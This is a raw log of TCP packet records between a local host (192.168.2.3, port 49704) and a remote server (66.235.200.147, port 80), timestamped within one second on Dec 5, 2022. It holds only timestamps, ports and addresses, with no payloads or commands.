Dec 5, 2022 01:32:31.394874096 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.394906998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394948006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394989014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394993067 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.395030975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395039082 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.395075083 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395117044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395154953 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.395663023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395706892 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395714998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.395749092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395790100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395797014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.395844936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395879030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395891905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.395915031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395951033 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.395961046 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.396528006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396568060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396579981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.396604061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396641016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396655083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.396676064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396711111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396723986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.396747112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396781921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.396791935 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.397397041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397435904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397445917 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.397471905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397507906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397521973 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.397547007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397583008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397595882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.397618055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397654057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.397670031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.398302078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398339033 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398350954 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.398375034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398408890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398422003 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.398444891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398482084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398518085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398533106 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.398559093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.398570061 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.399179935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399218082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399236917 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.399254084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399290085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399301052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.399326086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399362087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399394989 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.399395943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399447918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.399467945 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.400023937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.400062084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.400084019 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.405551910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405606031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405643940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405684948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405703068 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.405703068 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.405726910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405771017 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405775070 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.405812979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405853987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405864954 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.405895948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405937910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.405945063 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.405981064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406049013 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.406529903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406577110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406619072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406651020 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.406662941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406706095 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406713009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.406749964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406790972 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406799078 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.406832933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.406893015 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.407397985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407443047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407484055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407495975 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.407526016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407569885 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407573938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.407612085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407653093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407660961 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.407695055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.407752991 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.408288956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408330917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408374071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408382893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.408417940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408463001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408498049 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.408503056 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408550024 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408556938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.408591986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.408638954 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.409127951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409169912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409212112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409219980 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.409252882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409293890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409300089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.409334898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409377098 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409415960 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.409418106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.409472942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.409986019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410028934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410070896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410093069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.410114050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410156012 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410170078 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.410197020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410238028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410243988 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.410281897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410336971 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.410870075 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410937071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.410976887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411007881 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.411020994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411062956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411075115 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.411103964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411144972 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411151886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.411186934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411233902 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.411824942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411869049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411910057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411919117 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.411953926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.411994934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412002087 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.412036896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412079096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412084103 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.412122011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412178040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.412616968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412659883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412702084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412707090 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.412743092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412785053 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412789106 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.412827969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412869930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412875891 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.412911892 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.412962914 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.413505077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.413552999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.413615942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.415322065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415368080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415404081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415430069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.415446043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415488958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415493965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.415532112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415577888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415581942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.415627003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415673018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415677071 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.415715933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415757895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.415765047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.416300058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416332960 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416354895 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.416366100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416399956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416414022 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.416433096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416465998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416496992 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.416497946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416534901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.416547060 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.417207956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417243004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417263031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.417275906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417320967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417324066 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.417366028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417397976 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417416096 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.417431116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417464018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.417475939 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.418034077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418066978 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418086052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.418101072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418134928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418148041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.418168068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418201923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418214083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.418235064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418267965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418282986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.418908119 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418941975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418975115 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.418987989 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.419008970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419027090 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.419044971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419081926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419090986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.419117928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419151068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419176102 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.419756889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419809103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419826031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.419856071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419900894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419900894 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.419943094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419986010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.419989109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.420021057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420053959 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420073032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.420089006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420139074 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.420742989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420777082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420809984 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420830965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.420844078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420887947 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.420909882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420945883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420984030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.420996904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.421017885 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421051979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421066046 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.421695948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421732903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421765089 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421772957 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.421798944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421818972 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.421833992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421869040 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421900034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421907902 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.421931982 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.421948910 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.421966076 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422024965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.422643900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422677040 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422709942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422724009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.422744036 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422776937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422789097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.422811031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422843933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.422858000 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.428061962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428092957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428117990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.428119898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428152084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428169966 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.428181887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428214073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428246021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428275108 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.428277969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428296089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.428309917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428342104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428373098 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428379059 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.428405046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.428421021 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.429130077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429162979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429189920 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.429194927 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429227114 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429244995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.429259062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429290056 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429305077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.429335117 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429366112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429382086 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.429397106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.429485083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.430083036 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430115938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430146933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.430169106 CET	49704	80	192.168.2.3	66.235.200.147
